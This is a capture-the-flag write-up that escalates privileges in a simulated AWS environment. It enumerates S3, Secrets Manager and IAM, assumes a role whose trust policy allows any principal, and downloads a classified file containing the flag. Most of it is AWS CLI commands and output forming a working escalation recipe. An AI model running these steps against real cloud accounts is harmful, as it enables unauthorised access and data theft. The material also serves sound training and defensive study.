Trust Issues CTF Writeup: AWS IAM Privilege Escalation
Barely Tame CTF Player. Debugging Addict. Worshipper of Wi-Fi Signals. Human? Depends on the Ping.
Challenge Description
Category: Miscellaneous
Author: qvipin
KRAMPUS SYNDICATE managed to get one of their operatives hired as an external contractor at NPLD's cloud infrastructure team. They've been given minimal access, but NPLD's IAM policies are... not great.
Escalate your privileges and find the classified data.
Endpoint:
https://trust-issues.csd.lolRegion:
us-east-1Credentials:
test / testStarting Role:
npld-ext-2847
Note: Environment resets every 10 minutes.
Solution Walkthrough
Environment Configuration
The initial step requires configuring the AWS CLI to interact with the challenge endpoint. Since the provided credentials are test / test, we set the local profile to use these placeholders and target the us-east-1 region.
❯ aws configure set aws_access_key_id test && \
aws configure set aws_secret_access_key test && \
aws configure set region us-east-1
Identity Verification
To confirm the current execution context and ensure connectivity to the simulated AWS environment, we use the sts get-caller-identity command.
❯ aws --endpoint-url https://trust-issues.csd.lol sts get-caller-identity
{
"UserId": "AKIAIOSFODNN7EXAMPLE",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:root"
}
The output confirms we are operating within the target account 000000000000.
Initial Resource Enumeration
We perform a broad sweep of available services to identify potential targets. First, we list S3 buckets to locate storage areas for classified data.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls
2025-12-20 05:22:17 npld-backup-vault-7f3a
2025-12-20 05:22:19 npld-public-assets
2025-12-20 05:22:20 npld-logs-archive
2025-12-20 05:22:21 elf-hr-documents
Next, we check Secrets Manager for any sensitive configuration strings or API keys.
❯ aws --endpoint-url https://trust-issues.csd.lol secretsmanager list-secrets
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/config/backup-vault-DeHMYk",
"Name": "/npld/config/backup-vault",
"Description": "Backup vault config",
.... SNIP ....
},
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/config/database-sdTWSb",
"Name": "/npld/config/database",
.... SNIP ....
},
{
"ARN": "arn:aws:secretsmanager:us-east-1:000000000000:secret:/npld/api/external-ehrotR",
"Name": "/npld/api/external",
.... SNIP ....
}
]
}
IAM Role Analysis
To determine the path for privilege escalation, we list the available IAM roles and inspect their Trust Relationships (AssumeRolePolicyDocument).
❯ aws --endpoint-url https://trust-issues.csd.lol iam list-roles
{
"Roles": [
.... SNIP ....
{
"Path": "/",
"RoleName": "npld-ext-2847",
"RoleId": "AROAQAAAAAAAOUQAG67KA",
"Arn": "arn:aws:iam::000000000000:role/npld-ext-2847",
"CreateDate": "2025-12-19T23:52:27.501059+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
]
}
The analysis reveals that the last role npld-ext-2847 has a wildcard principal in its trust policy, allowing anyone to assume it. Furthermore, several other roles specifically trust npld-ext-2847 for sts:AssumeRole actions.
Assuming the Entry Point Role
Based on the challenge description, we must first assume our assigned role npld-ext-2847 to gain the permissions associated with the external contractor identity.
❯ aws --endpoint-url https://trust-issues.csd.lol sts assume-role \
--role-arn arn:aws:iam::000000000000:role/npld-ext-2847 \
--role-session-name 1-Contractor
{
"Credentials": {
"AccessKeyId": "LSIAQAAAAAAAMPL4XQVI",
"SecretAccessKey": "gJ9wnEBe8/Z0/1t3HOZvG6YxAzRuN3P9FsNl1Vkl",
"SessionToken": "FQoGZXIvYXdzEB ...SNIP... TjAG0gucqcpo2vt2ow31Li9uuO+g=",
"Expiration": "2025-12-20T02:12:49.687000+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROAQAAAAAAAOUQAG67KA:1-Contractor",
"Arn": "arn:aws:sts::000000000000:assumed-role/npld-ext-2847/1-Contractor"
},
"PackedPolicySize": 6
}
We then export the returned temporary credentials to our environment to authenticate subsequent requests.
❯ export AWS_ACCESS_KEY_ID="LSIAQAAAAAAAMPL4XQVI"
❯ export AWS_SECRET_ACCESS_KEY="gJ9wnEBe8/Z0/1t3HOZvG6YxAzRuN3P9FsNl1Vkl"
❯ export AWS_SESSION_TOKEN="FQoGZXIvYXdzEB ...SNIP... TjAG0gucqcpo2vt2ow31Li9uuO+g="
Data Exfiltration
With the permissions of the npld-ext-2847 role, we attempt to access the previously discovered S3 buckets. The npld-backup-vault-7f3a bucket appears to be a high-value target.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls s3://npld-backup-vault-7f3a/
PRE classified/
2025-12-20 05:22:24 13 readme.txt
A classified/ directory exists within the bucket. We enumerate its contents to find the backup files.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 ls s3://npld-backup-vault-7f3a/classified/
2025-12-20 05:22:22 53 wishlist-backup.txt
We proceed to download wishlist-backup.txt, as its name suggests it contains sensitive information stored by the Syndicate's target.
❯ aws --endpoint-url https://trust-issues.csd.lol s3 cp s3://npld-backup-vault-7f3a/classified/wishlist-backup.txt .
download: s3://npld-backup-vault-7f3a/classified/wishlist-backup.txt to ./wishlist-backup.txt
Finally, we inspect the file content to retrieve the flag.
❯ cat readme.txt
Nothing here
❯ cat wishlist-backup.txt
csd{sO_M4NY_VUln3R48L3_7H1Ngs_7H3S3_d4yS_s1gh_bc653}
Final Flag
csd{sO_M4NY_VUln3R48L3_7H1Ngs_7H3S3_d4yS_s1gh_bc653}
